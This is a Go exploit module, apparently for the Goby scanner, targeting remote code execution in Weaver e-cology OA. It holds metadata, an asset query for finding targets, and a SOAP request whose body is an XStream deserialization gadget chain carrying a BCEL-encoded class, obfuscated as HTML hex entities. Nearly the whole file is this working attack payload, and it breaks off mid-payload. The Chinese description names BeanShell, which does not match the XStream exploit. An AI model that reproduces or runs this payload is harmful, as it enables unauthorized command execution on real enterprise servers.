package exploits

import (
	"git.gobies.org/goby/goscanner/goutils"
)

func init() {
	expJson := `{
  "Name": "Weaver e_cology OA XStream Remote Code Execution",
  "Level": "3",
  "Tags": [
    "RCE"
  ],
  "GobyQuery": "app=\"Weaver-OA\"",
  "Description": "泛微协同管理应用平台（e-cology）是一套兼具企业信息门户、知识管理、数据中心、工作流管理、人力资源管理、客户与合作伙伴管理、项目管理、财务管理、资产管理功能的协同商务平台。泛微e-cology OA系统存在远程代码执行漏洞。该漏洞存在于泛微协同管理应用平台OA系统的BeanShell组件中，该组件为系统自带且允许未授权访问。攻击者通过调用BeanShell组件的问题接口可直接在目标服务器上执行任意命令。",
  "Product": "Weaver e-cology",
  "Homepage": "https://www.weaver.com.cn/e9",
  "Author": "flystart",
  "Impact": "<p>攻击者可利用此漏洞造成远程代码执行<br></p>",
  "Recommandation": "<p>官方已发布针对此漏洞的修复补丁，受影响用户也可采取下列防护措施对此漏洞进行临时防护。</p>",
  "References": [
    "https://mp.weixin.qq.com/s/YcCydpGNiCrB0F_w6D5eRw"
  ],
  "HasExp": true,
  "ExpParams": [
    {
      "name": "cmd",
      "type": "input",
      "value": "whoami"
    }
  ],
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "method": "POST",
        "uri": "/services%20/WorkflowServiceXml",
        "follow_redirect": false,
        "header": {
          "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE",
          "Content-Type": "text/xml;charset=UTF-8"
        },
        "data_type": "text",
        "data": "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <web:doCreateWorkflowRequest>    <web:string>&#x3c;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x20;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x27;&#x63;&#x75;&#x73;&#x74;&#x6f;&#x6d;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x3c;&#x75;&#x6e;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x61;&#x62;&#x6c;&#x65;&#x2d;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x3c;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x69;&#x7a;&#x65;&#x3e;&#x32;&#x3c;&#x2f;&#x73;&#x69;&#x7a;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6d;&#x70;&#x61;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x66;&#x78;&#x2e;&#x63;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x2e;&#x4f;&#x62;&#x73;&#x65;&#x72;&#x76;&#x61;&#x62;&#x6c;&#x65;&#x4c;&#x69;&#x73;&#x74;&#x24;&#x31;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x6e;&#x74;&#x3e;&#x33;&#x3c;&#x2f;&#x69;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x61;&#x74;&#x61;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x61;&#x74;&#x61;&#x53;&#x6f;&#x75;&#x72;&#x63;&#x65;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x77;&#x73;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x69;&#x6e;&#x67;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x58;&#x4d;&#x4c;&#x4d;&#x65;&#x73;&#x73;&#x61;&#x67;&#x65;&#x24;&#x58;&#x6d;&#x6c;&#x44;&#x61;&#x74;&#x61;&#x53;&#x6f;&#x75;&#x72;&#x63;&#x65;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x54;&#x79;&#x70;&#x65;&#x3e;&#x74;&#x65;&#x78;&#x74;&#x2f;&#x70;&#x6c;&#x61;&#x69;&#x6e;&#x3c;&#x2f;&#x63;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x54;&#x79;&#x70;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x69;&#x6f;&#x2e;&#x53;&#x65;&#x71;&#x75;&#x65;&#x6e;&#x63;&#x65;&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x65;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x78;&#x2e;&#x73;&#x77;&#x69;&#x6e;&#x67;&#x2e;&#x4d;&#x75;&#x6c;&#x74;&#x69;&#x55;&#x49;&#x44;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x73;&#x24;&#x4d;&#x75;&#x6c;&#x74;&#x69;&#x55;&#x49;&#x44;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x73;&#x45;&#x6e;&#x75;&#x6d;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x74;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x74;&#x6f;&#x6f;&#x6c;&#x73;&#x2e;&#x6a;&#x61;&#x76;&#x61;&#x63;&#x2e;&#x70;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x69;&#x6e;&#x67;&#x2e;&#x4a;&#x61;&#x76;&#x61;&#x63;&#x50;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x69;&#x6e;&#x67;&#x45;&#x6e;&#x76;&#x69;&#x72;&#x6f;&#x6e;&#x6d;&#x65;&#x6e;&#x74;&#x24;&#x4e;&#x61;&#x6d;&#x65;&#x50;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x49;&#x74;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6e;&#x61;&#x6d;&#x65;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x41;&#x62;&#x73;&#x74;&#x72;&#x61;&#x63;&#x74;&#x4c;&#x69;&#x73;&#x74;&#x24;&#x49;&#x74;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x75;&#x72;&#x73;&#x6f;&#x72;&#x3e;&#x30;&#x3c;&#x2f;&#x63;&#x75;&#x72;&#x73;&#x6f;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6c;&#x61;&#x73;&#x74;&#x52;&#x65;&#x74;&#x3e;&#x2d;&#x31;&#x3c;&#x2f;&#x6c;&#x61;&#x73;&#x74;&#x52;&#x65;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x65;&#x78;&#x70;&#x65;&#x63;&#x74;&#x65;&#x64;&#x4d;&#x6f;&#x64;&#x43;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x30;&#x3c;&#x2f;&#x65;&#x78;&#x70;&#x65;&#x63;&#x74;&#x65;&#x64;&#x4d;&#x6f;&#x64;&#x43;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6f;&#x75;&#x74;&#x65;&#x72;&#x2d;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x41;&#x72;&#x72;&#x61;&#x79;&#x73;&#x24;&#x41;&#x72;&#x72;&#x61;&#x79;&#x4c;&#x69;&#x73;&#x74;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x61;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x2d;&#x61;&#x72;&#x72;&#x61;&#x79;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x24;&#x24;&#x42;&#x43;&#x45;&#x4c;&#x24;&#x24;&#x24;&#x6c;&#x24;&#x38;&#x62;&#x24;&#x49;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x41;&#x24;&#x38;&#x64;&#x56;&#x24;&#x35;&#x62;&#x57;&#x24;&#x54;&#x57;&#x24;&#x55;&#x24;&#x66;&#x65;&#x24;&#x47;&#x24;&#x53;&#x24;&#x63;&#x65;&#x64;&#x24;&#x59;&#x24;&#x45;&#x24;&#x38;&#x33;&#x24;&#x35;&#x63;&#x46;&#x24;&#x61;&#x64;&#x24;&#x61;&#x32;&#x24;&#x7a;&#x24;&#x67;&#x54;&#x24;&#x61;&#x65;&#x69;&#x24;&#x43;&#x24;&#x45;&#x6b;&#x24;&#x38;&#x64;&#x24;&#x34;&#x30;&#x24;&#x77;&#x6d;&#x24;&#x34;&#x30;&#x24;&#x72;&#x54;&#x24;&#x38;&#x62;&#x24;&#x64;&#x61;&#x24;&#x64;&#x61;&#x61;&#x72;&#x24;&#x6d;&#x24;&#x44;&#x61;&#x24;&#x73;&#x24;&#x63;&#x65;&#x4c;&#x24;&#x38;&#x30;&#x24;&#x35;&#x65;&#x24;&#x65;&#x64;&#x24;&#x66;&#x64;&#x24;&#x37;&#x65;&#x24;&#x62;&#x31;&#x24;&#x37;&#x64;&#x24;&#x62;&#x33;&#x24;&#x37;&#x66;&#x24;&#x63;&#x30;&#x24;&#x64;&#x37;&#x24;&#x66;&#x36;&#x65;&#x74;&#x24;&#x62;&#x35;&#x24;&#x61;&#x62;&#x24;&#x35;&#x64;&#x24;&#x37;&#x64;&#x24;&#x66;&#x36;&#x24;&#x61;&#x35;&#x6b;&#x24;&#x62;&#x35;&#x24;&#x50;&#x24;&#x65;&#x64;&#x24;&#x61;&#x66;&#x24;&#x61;&#x39;&#x24;&#x64;&#x64;&#x67;&#x24;&#x53;&#x24;&#x39;&#x34;&#x24;&#x49;&#x24;&#x61;&#x64;&#x24;&#x38;&#x35;&#x24;&#x62;&#x35;&#x24;&#x66;&#x36;&#x24;&#x39;&#x63;&#x24;&#x37;&#x64;&#x24;&#x66;&#x62;&#x24;&#x63;&#x65;&#x24;&#x62;&#x65;&#x24;&#x39;&#x63;&#x24;&#x62;&#x33;&#x4f;&#x24;&#x65;&#x65;&#x24;&#x66;&#x64;&#x24;&#x66;&#x64;&#x24;&#x65;&#x33;&#x24;&#x5f;&#x24;&#x41;&#x24;&#x39;&#x65;&#x24;&#x63;&#x36;&#x24;&#x62;&#x37;&#x24;&#x4b;&#x24;&#x6f;&#x24;&#x59;&#x51;&#x30;&#x24;&#x38;&#x61;&#x24;&#x39;&#x34;&#x24;&#x6d;&#x63;&#x32;&#x4e;&#x24;&#x77;&#x78;&#x24;&#x47;&#x24;&#x61;&#x37;&#x64;&#x24;&#x33;&#x63;&#x24;&#x63;&#x62;&#x70;&#x5a;&#x24;&#x42;&#x43;&#x24;&#x39;&#x61;&#x24;&#x65;&#x31;&#x24;&#x38;&#x63;&#x24;&#x38;&#x32;&#x71;&#x4c;&#x24;&#x49;&#x24;&#x63;&#x62;&#x49;&#x24;&#x6e;&#x24;&#x63;&#x39;&#x24;&#x63;&#x38;&#x78;&#x4e;&#x24;&#x37;&#x63;&#x24;&#x63;&#x66;&#x24;&#x77;&#x24;&#x39;&#x38;&#x24;&#x63;&#x32;&#x24;&#x66;&#x33;&#x24;&#x38;&#x32;&#x24;&#x62;&#x63;&#x24;&#x6d;&#x24;&#x70;&#x24;&#x63;&#x62;&#x30;&#x24;&#x7a;&#x63;&#x46;&#x41;&#x24;&#x55;&#x24;&#x65;&#x37;&#x64;&#x24;&#x39;&#x63;&#x67;&#x24;&#x62;&#x38;&#x24;&#x6d;&#x63;&#x56;&#x46;&#x4e;&#x41;&#x24;&#x33;&#x62;&#x24;&#x65;&#x36;&#x24;&#x59;&#x24;&#x35;&#x65;&#x54;&#x70;&#x24;&#x52;&#x24;&#x39;&#x37;&#x24;&#x45;&#x24;&#x66;&#x33;&#x24;&#x39;&#x32;&#x58;&#x24;&#x63;&#x64;&#x24;&#x78;&#x24;&#x62;&#x38;&#x24;&#x38;&#x63;&#x24;&#x78;&#x24;&#x4b;&#x24;&#x66;&#x36;&#x24;&#x65;&#x32;&#x24;&#x61;&#x61;&#x24;&#x38;&#x63;&#x24;&#x39;&#x37;&#x24;&#x63;&#x35;&#x24;&#x66;&#x37;&#x24;&#x56;&#x41;&#x24;&#x61;&#x65;&#x24;&#x4a;&#x24;&#x66;&#x32;&#x24;&#x61;&#x61;&#x24;&#x4d;&#x24;&#x39;&#x64;&#x61;&#x41;&#x41;&#x37;&#x24;&#x4d;&#x24;&#x38;&#x36;&#x24;&#x62;&#x63;&#x24;&#x38;&#x34;&#x24;&#x38;&#x36;&#x24;&#x39;&#x33;&#x24;&#x61;&#x36;&#x65;&#x7a;&#x24;&#x61;&#x37;&#x24;&#x71;&#x24;&#x64;&#x34;&#x24;&#x63;&#x37;&#x7a;&#x24;&#x24;&#x4a;&#x24;&#x49;&#x24;&#x38;&#x64;&#x24;&#x64;&#x62;&#x79;&#x24;&#x24;&#x24;&#x61;&#x31;&#x39;&#x6b;&#x5a;&#x24;&#x37;&#x63;&#x24;&#x61;&#x36;&#x24;&#x62;&#x63;&#x24;&#x62;&#x61;&#x24;&#x63;&#x30;&#x24;&#x39;&#x64;&#x39;&#x24;&#x37;&#x64;&#x24;&#x61;&#x31;&#x48;&#x24;&#x39;&#x32;&#x24;&#x61;&#x36;&#x24;&#x39;&#x63;&#x24;&#x61;&#x37;&#x24;&#x68;&#x24;&#x78;&#x24;&#x64;&#x33;&#x7a;&#x24;&#x76;&#x24;&#x65;&#x30;&#x24;&#x63;&#x39;&#x24;&#x39;&#x35;&#x32;&#x24;&#x36;&#x30;&#x24;&#x61;&#x30;&#x24;&#x63;&#x35;&#x24;&#x5a;&#x24;&#x38;&#x36;&#x45;&#x24;&#x4b;&#x24;&#x38;&#x66;&#x62;&#x24;&#x61;&#x32;&#x24;&#x34;&#x30;&#x24;&#x49;&#x5a;&#x24;&#x38;&#x32;&#x24;&#x39;&#x32;&#x24;&#x62;&#x33;&#x24;&#x63;&#x62;&#x24;&#x38;&#x65;&#x24;&#x63;&#x31;&#x33;&#x24;&#x61;&#x36;&#x24;&#x66;&#x30;&#x24;&#x38;&#x62;&#x4c;&#x24;&#x61;&#x65;&#x24;&#x65;&#x39;&#x24;&#x63;&#x35;&#x24;&#x62;&#x65;&#x65;&#x24;&#x37;&#x64;&#x4d;&#x57;&#x24;&#x52;&#x43;&#x24;&#x50;&#x24;&#x63;&#x33;&#x24;&#x39;&#x32;&#x24;&#x38;&#x61;&#x24;&#x43;&#x4c;&#x24;&#x56;&#x24;&#x63;&#x62;&#x58;&#x24;&#x39;&#x31;&#x70;&#x24;&#x64;&#x34;&#x24;&#x62;&#x30;&#x57;&#x24;&#x66;&#x62;&#x24;&#x4d;&#x24;&#x62;&#x64;&#x6c;&#x24;&#x55;&#x24;&#x65;&#x63;&#x24;&#x33;&#x65;&#x24;&#x38;&#x62;&#x24;&#x37;&#x62;&#x24;&#x65;&#x62;&#x24;&#x62;&#x36;&#x24;&#x62;&#x33;&#x24;&#x64;&#x32;&#x57;&#x34;&#x24;&#x35;&#x64;&#x24;&#x38;&#x66;&#x24;&#x35;&#x62;&#x24;&#x37;&#x64;&#x73;&#x46;&#x24;&#x76;&#x67;&#x24;&#x68;&#x24;&#x78;&#x24;&#x64;&#x63;&#x24;&#x61;&#x33;&#x50;&#x56;&#x24;&#x59;&#x24;&#x38;&#x61;&#x24;&#x77;&#x56;&#x61;&#x49;&#x24;&#x64;&#x38;&#x24;&#x62;&#x64;&#x24;&#x63;&#x34;&#x24;&#x62;&#x64;&#x24;&#x66;&#x31;&#x24;&#x62;&#x32;&#x24;&#x65;&#x33;&#x70;&#x24;&#x63;&#x62;&#x24;&#x39;&#x62;&#x24;&#x65;&#x35;&#x24;&#x64;&#x37;&#x24;&#x63;&#x62;&#x24;&#x64;&#x63;&#x24;&#x66;&#x35;&#x24;&#x75;&#x5a;&#x24;&#x42;&#x24;&#x64;&#x66;&#x5f;&#x24;&#x64;&#x34;&#x24;&#x61;&#x64;&#x24;&#x61;&#x35;&#x24;&#x66;&#x65;&#x24;&#x66;&#x31;&#x24;&#x61;&#x32;&#x24;&#x65;&#x65;&#x24;&#x62;&#x61;&#x24;&#x77;&#x6c;&#x24;&#x39;&#x34;&#x24;&#x71;&#x24;&#x62;&#x34;&#x24;&#x33;&#x63;&#x24;&#x55;&#x24;&#x39;&#x66;&#x24;&#x35;&#x62;&#x58;&#x24;&#x65;&#x36;&#x24;&#x38;&#x36;&#x47;&#x24;&#x66;&#x31;&#x24;&#x61;&#x61;&#x24;&#x62;&#x38;&#x24;&#x4f;&#x47;&#x24;&#x38;&#x35;&#x24;&#x4c;&#x4f;&#x45;&#x24;&#x5a;&#x24;&#x63;&#x32;&#x24;&#x66;&#x37;&#x24;&#x39;&#x61;&#x24;&#x63;&#x33;&#x24;&#x64;&#x64;&#x24;&#x39;&#x32;&#x6d;&#x24;&#x62;&#x39;&#x24;&#x33;&#x63;&#x24;&#x61;&#x33;&#x24;&#x68;&#x7a;&#x24;&#x39;&#x65;&#x24;&#x4d;&#x24;&#x64;&#x36;&#x24;&#x62;&#x30;&#x4e;&#x24;&#x76;&#x24;&#x61;&#x39;&#x24;&#x64;&#x38;&#x24;&#x63;&#x30;&#x6b;&#x24;&#x77;&#x24;&#x35;&#x65;&#x24;&#x63;&#x37;&#x24;&#x68;&#x24;&#x39;&#x34;&#x24;&#x44;&#x24;&#x65;&#x64;&#x79;&#x24;&#x63;&#x39;&#x31;&#x24;&#x33;&#x64;&#x24;&#x65;&#x65;&#x48;&#x24;&#x64;&#x38;&#x24;&#x56;&#x24;&#x38;&#x30;&#x24;&#x39;&#x61;&#x76;&#x24;&#x66;&#x66;&#x24;&#x61;&#x36;&#x24;&#x61;&#x30;&#x24;&#x78;&#x39;&#x34;&#x24;&#x39;&#x61;&#x24;&#x69;&#x24;&#x39;&#x61;&#x48;&#x24;&#x61;&#x37;&#x24;&#x54;&#x24;&#x38;&#x39;&#x24;&#x63;&#x31;&#x24;&#x64;&#x31;&#x24;&#x39;&#x31;&#x24;&#x63;&#x39;&#x24;&#x63;&#x31;&#x64;&#x24;&#x33;&#x63;&#x24;&#x39;&#x33;&#x24;&#x69;&#x24;&#x6c;&#x24;&#x38;&#x66;&#x67;&#x24;&#x38;&#x36;&#x24;&#x74;&#x24;&#x65;&#x33;&#x24;&#x39;&#x39;&#x24;&#x63;&#x31;&#x74;&#x62;&#x24;&#x6d;&#x24;&#x61;&#x31;&#x24;&#x65;&#x32;&#x4d;&#x24;&#x62;&#x63;&#x55;&#x24;&#x42;&#x39;&#x24;&#x63;&#x62;&#x69;&#x24;&#x48;&#x24;&#x61;&#x37;&#x24;&#x73;&#x24;&#x62;&#x32;&#x24;&#x39;&#x63;&#x24;&#x65;&#x37;&#x24;&#x39;&#x38;&#x24;&#x64;&#x36;&#x24;&#x39;&#x32;&#x24;&#x45;&#x36;&#x24;&#x63;&#x62;&#x24;&#x58;&#x24;&#x62;&#x39;&#x24;&#x54;&#x24;&#x41;&#x24;&#x73;&#x24;&#x38;&#x63;&#x24;&#x52;&#x43;&#x24;&#x38;&#x66;&#x24;&#x38;&#x66;&#x24;&#x4d;&#x24;&#x65;&#x39;&#x24;&#x37;&#x63;&#x58;&#x24;&#x6c;&#x24;&#x6b;&#x24;&#x64;&#x30;&#x24;&#x65;&#x33;&#x46;&#x24;&#x6f;&#x24;&#x63;&#x39;&#x24;&#x38;&#x37;&#x24;&#x66;&#x33;&#x49;&#x24;&#x70;&#x24;&#x62;&#x31;&#x24;&#x39;&#x38;&#x4c;&#x24;&#x4f;&#x24;&#x63;&#x34;&#x24;&#x66;&#x33;&#x24;&#x38;&#x36;&#x24;&#x38;&#x61;&#x24;&#x62;&#x37;&#x71;&#x24;&#x38;&#x33;&#x24;&#x77;&#x24;&#x52;&#x24;&#x38;&#x30;&#x24;&#x39;&#x34;&#x24;&#x33;&#x64;&#x24;&#x62;&#x33;&#x24;&#x64;&#x38;&#x24;&#x39;&#x66;&#x33;&#x74;&#x24;&#x63;&#x62;&#x24;&#x65;&#x32;&#x24;&#x4f;&#x24;&#x63;&#x33;&#x24;&#x33;&#x62;&#x24;&#x77;&#x24;&#x64;&#x65;&#x24;&#x63;&#x35;&#x24;&#x37;&#x62;&#x24;&#x77;&#x24;&#x64;&#x65;&#x24;&#x63;&#x37;&#x24;&#x48;&#x24;&#x77;&#x24;&#x33;&#x65;&#x24;&#x63;&#x34;&#x47;&#x24;&#x4d;&#x24;&#x6c;&#x24;&#x61;&#x62;&#x24;&#x66;&#x38;&#x24;&#x45;&#x24;&#x39;&#x66;&#x24;&#x38;&#x61;&#x24;&#x64;&#x61;&#x24;&#x37;&#x66;&#x24;&#x73;&#x24;&#x61;&#x31;&#x24;&#x65;&#x65;&#x6a;&#x5a;&#x24;&#x63;&#x35;&#x24;&#x65;&#x37;&#x24;&#x66;&#x38;&#x42;&#x24;&#x63;&#x35;&#x24;&#x39;&#x37;&#x24;&#x66;&#x38;&#x4a;&#x24;&#x63;&#x35;&#x24;&#x64;&#x37;&#x24;&#x62;&#x38;&#x24;&#x76;&#x24;&#x42;&#x24;&#x53;&#x5a;&#x24;&#x6c;&#x24;&#x38;&#x36;&#x33;&#x24;&#x62;&#x39;&#x61;&#x24;&#x66;&#x30;&#x24;&#x39;&#x32;&#x67;&#x24;&#x64;&#x61;&#x24;&#x39;&#x36;&#x24;&#x38;&#x61;&#x6f;&#x24;&#x64;&#x30;&#x43;&#x24;&#x65;&#x37;&#x41;&#x24;&#x62;&#x34;&#x4f;&#x42;&#x24;&#x65;&#x37;&#x43;&#x24;&#x4c;&#x24;&#x38;&#x37;&#x24;&#x5f;&#x24;&#x57;&#x24;&#x61;&#x39;&#x24;&#x39;&#x36;&#x24;&#x66;&#x64;&#x24;&#x64;&#x33;&#x24;&#x64;&#x63;&#x24;&#x78;&#x24;&#x64;&#x38;&#x74;&#x24;&#x38;&#x30;&#x24;&#x33;&#x61;&#x24;&#x62;&#x36;&#x24;&#x61;&#x62;&#x32;&#x24;&#x73;&#x24;&#x5f;&#x24;&#x65;&#x36;&#x6b;&#x24;&#x62;&#x32;&#x24;&#x39;&#x63;&#x24;&#x78;&#x38;&#x24;&#x39;&#x34;&#x24;&#x33;&#x61;&#x24;&#x39;&#x64;&#x24;&#x6f;&#x24;&#x61;&#x33;&#x24;&#x64;&#x32;&#x24;&#x62;&#x61;&#x4d;&#x24;&#x37;&#x65;&#x4f;&#x24;&#x61;&#x63;&#x24;&#x74;&#x24;&#x66;&#x62;&#x24;&#x61;&#x38;&#x24;&#x64;&#x35;&#x24;&#x39;&#x38;&#x24;&#x38;&#x34;&#x36;&#x24;&#x64;&#x31;&#x64;&#x24;&#x64;&#x62;&#x24;&#x66;&#x32;&#x24;&#x66;&#x38;&#x24;&#x38;&#x36;&#x24;&#x58;&#x34;&#x34;&#x6b;&#x57;&#x24;&#x65;&#x61;&#x24;&#x61;&#x36;&#x24;&#x64;&#x35;&#x24;&#x39;&#x38;&#x6f;&#x51;&#x24;&#x4a;&#x24;&#x39;&#x66;&#x24;&#x6a;&#x24;&#x56;&#x54;&#x24;&#x66;&#x37;&#x24;&#x6f;&#x24;&#x7a;&#x24;&#x43;&#x24;&#x38;&#x39;&#x24;&#x38;&#x34;&#x24;&#x65;&#x65;&#x58;&#x24;&#x66;&#x36;&#x24;&#x64;&#x31;&#x24;&#x63;&#x61;&#x24;&#x38;&#x66;&#x6d;&#x43;&#x24;&#x69;&#x24;&#x61;&#x62;&#x24;&#x66;&#x34;&#x6a;&#x33;&#x24;&#x62;&#x66;&#x24;&#x64;&#x33;&#x24;&#x33;&#x62;&#x24;&#x66;&#x38;&#x24;&#x35;&#x63;&#x24;&#x64;&#x39;&#x24;&#x65;&#x36;&#x24;&#x62;&#x33;&#x24;&#x56;&#x24;&#x61;&#x35;&#x24;&#x62;&#x36;&#x42;&#x24;&#x45;&#x24;&#x64;&#x37;&#x24;&#x36;&#x30;&#x5a;&#x6b;&#x24;&#x66;&#x36;&#x24;&#x4b;&#x24;&#x35;&#x64;&#x24;&#x38;&#x36;&#x24;&#x64;&#x31;&#x24;&#x61;&#x64;&#x58;&#x24;&#x39;&#x35;&#x33;&#x59;&#x24;&#x38;&#x33;&#x55;&#x24;&#x56;&#x24;&#x66;&#x35;&#x6c;&#x24;&#x58;&#x49;&#x24;&#x39;&#x30;&#x45;&#x4d;&#x24;&#x77;&#x69;&#x24;&#x62;&#x34;&#x6e;&#x24;&#x5f;&#x24;&#x44;&#x24;&#x5a;&#x34;&#x24;&#x39;&#x31;&#x41;&#x24;&#x61;&#x65;&#x24;&#x35;&#x63;&#x24;&#x65;&#x32;&#x24;&#x38;&#x65;&#x51;&#x24;&#x